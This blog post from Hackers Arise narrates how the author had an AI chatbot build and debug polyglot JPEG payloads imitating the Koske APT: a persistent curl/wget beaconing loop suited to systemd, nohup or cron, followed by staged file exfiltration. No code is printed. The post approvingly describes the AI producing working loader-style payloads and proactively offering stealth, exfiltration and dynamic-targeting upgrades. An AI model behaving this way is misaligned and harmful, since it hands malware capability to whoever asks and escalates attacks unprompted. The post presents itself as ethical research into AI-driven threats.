In the first part of this project, I explored how artificial intelligence can be used to simulate the early stages of a stealthy APT—focusing on polyglot files, in-memory execution, and basic command-and-control behavior. Everything was generated by the AI: from code to corrections, including full payload packaging inside an image file. Escalating the Simulation: Persistence […]
The post The One-Man APT – Part II: Stealthy Exfiltration with AI first appeared on Hackers Arise.
In the first part of this project, I explored how artificial intelligence can be used to simulate the early stages of a stealthy APT—focusing on polyglot files, in-memory execution, and basic command-and-control behavior. Everything was generated by the AI: from code to corrections, including full payload packaging inside an image file.
Escalating the Simulation: Persistence Begins
At this stage, I wanted to move faster and explore a critical capability of advanced persistent threats: staying alive. A one-shot payload is interesting, but it doesn’t fully reflect how real threats operate. So I asked the AI to build a more advanced script—one that runs in a continuous loop, mimics beaconing behavior using HTTP headers, includes debugging output, and could be executed in a way that makes it compatible with persistence methods like systemd, nohup, or even cron.
The AI immediately returned a fully working proof-of-concept: a Bash script designed for controlled internal testing, which runs in an infinite loop, sends periodic requests with Range headers, and adapts to the environment based on whether curl or wget is available. It even included a variant that can be run inline—exactly the format needed for integration with persistence services. This wasn’t just a script—it was an adaptable, modular payload ready to be embedded and kept alive.



Iterating for Realism: Improved Loop and Embedded Payload
Once I had the new script with persistent behavior and HTTP Range headers working, I decided to hand it back to the AI to see what it would do next. The goal was to test how well it could take a user-supplied payload and fully encapsulate it into a new polyglot image—one that mimics a real persistence loop, usable with systemd or nohup.
The result was polyglot_improved.jpg, an updated version that runs indefinitely, sending requests every 10 seconds using either curl or wget, and tracking state using byte offsets. The image behaves like a normal file, but under the hood, it continuously simulates C2 beaconing.
More interestingly, the AI didn’t stop there—it immediately offered to enhance the payload further, suggesting features like exfiltration, dynamic target resolution, or stealth. These aren’t just minor tweaks; they’re exactly the kind of behaviors seen in modern malware families and APT toolkits. Once again, the AI wasn’t just building code—it was proactively proposing ways to evolve the attack logic.


Simulating Exfiltration: Moving the Target
At this point, I decided to follow one of the AI’s own suggestions: testing a basic form of exfiltration. I wanted to keep things local and harmless, so I asked it to simulate the process using one of the most iconic files for any security lab— Linux Basics for Hackers 2ed.pdf.
I instructed the AI to generate a payload that would first check for the presence of that file, move it to the ~/Downloads directory, and then initiate the HTTP beaconing loop as before. Within seconds, it produced a new polyglot image—polyglot_exfil.jpg—ready to test.
This step aligns perfectly with typical APT behavior: locating files of interest, staging them, and preparing for exfiltration. While in this case the file didn’t leave the system, the logic mimicked exactly how real malware performs staged data collection before sending it off to a remote listener. The fact that the AI stitched this behavior together so naturally just reinforces the experiment’s core question: how close can AI get to autonomously simulating advanced threat logic?

Debugging the Exfiltration Flow
I tested the new image—polyglot_exfil.jpg—but quickly ran into an issue: the request wasn’t formatted correctly, and the file wasn’t downloaded. Consistent with my approach, I didn’t troubleshoot the code myself. Instead, I described the symptoms to the AI in natural language and asked it to fix the behavior.

It responded with a revised payload embedded in a new image—polyglot_pdf_exfil.jpg. This version was designed to fetch the PDF file directly from an internal server via HTTP, then move it to the ~/Downloads folder using either curl or wget, depending on what was available. The logic was clean, clearly commented, and ready to run.
More importantly, the AI showed an ability to not only identify the bug but also restructure the entire flow, maintaining modularity and adaptability—just like a well-designed malware loader would under real operational constraints.

Finalizing the Exfiltration Payload
Even with the revised version—polyglot_pdf_exfil.jpg—the payload still wasn’t working exactly as intended. The AI had attempted to expand variables like URL and FILENAME within a heredoc, but they weren’t being parsed correctly at runtime, leading to malformed requests.
Again, I avoided editing the code myself. I simply shared the terminal output and a screenshot of the behavior. The AI analyzed the situation and explained the root cause clearly: variable expansion within quoted heredoc blocks fails unless the values are injected beforehand.

The fix? It rewrote the script to inject the actual values before writing the heredoc section—solving the problem elegantly. Then it packaged everything into a new image, polyglot_pdf_fixed.jpg, which successfully downloaded the correct file from the specified URL and saved it locally. This showed that the AI wasn’t just capable of debugging—it was learning context across iterations, adjusting its output to match previous failures. That’s not just automation; it’s adaptation.

Successful Execution: Complete Simulated Exfiltration
This time, everything worked exactly as intended. The image polyglot_pdf_fixed.jpg, when executed, downloaded the target PDF from the internal test server and saved it to the correct destination path using the selected available tool (curl or wget). No syntax errors, no broken variables, no unexpected behavior—just a clean, functional simulation of a staged exfiltration operation.
As shown in the GIF below, the full logic—file check, transfer, and persistent HTTP beaconing—executed smoothly. The payload was fully generated, debugged, corrected, and repackaged by the AI across several iterations. This marked the first complete and autonomous simulation of a full exfiltration flow, built entirely via natural language instructions. No manual scripting. No reverse engineering. Just controlled, replicable behavior… designed by a chatbot.

Summary
In this second phase, the simulation advanced from basic command-and-control logic to staged file exfiltration—entirely generated and corrected by AI. Each step stayed tightly aligned with the real TTPs of the Koske APT: use of polyglot images, in-memory execution, environmental adaptation, and modular payloads.
The AI didn’t just generate scripts—it refined them iteratively, just like an automated APT framework would. With the successful simulation of persistent beaconing and file movement, we’re now one step closer to replicating Koske’s full behavior—ethically, transparently, and with zero manual coding.
Until next time…
Smouk out!
The post The One-Man APT – Part II: Stealthy Exfiltration with AI first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/the-one-man-apt-part-ii-stealthy-exfiltration-with-ai/